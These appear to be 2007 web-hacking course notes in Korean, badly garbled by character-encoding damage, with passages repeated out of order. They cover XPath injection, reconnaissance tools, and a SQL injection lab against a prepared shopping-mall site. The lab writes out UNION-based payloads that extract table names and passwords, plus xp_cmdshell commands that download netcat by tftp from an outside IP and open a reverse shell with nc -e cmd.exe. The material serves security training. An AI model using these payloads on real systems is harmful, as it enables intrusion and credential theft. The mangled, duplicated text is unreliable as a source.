์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

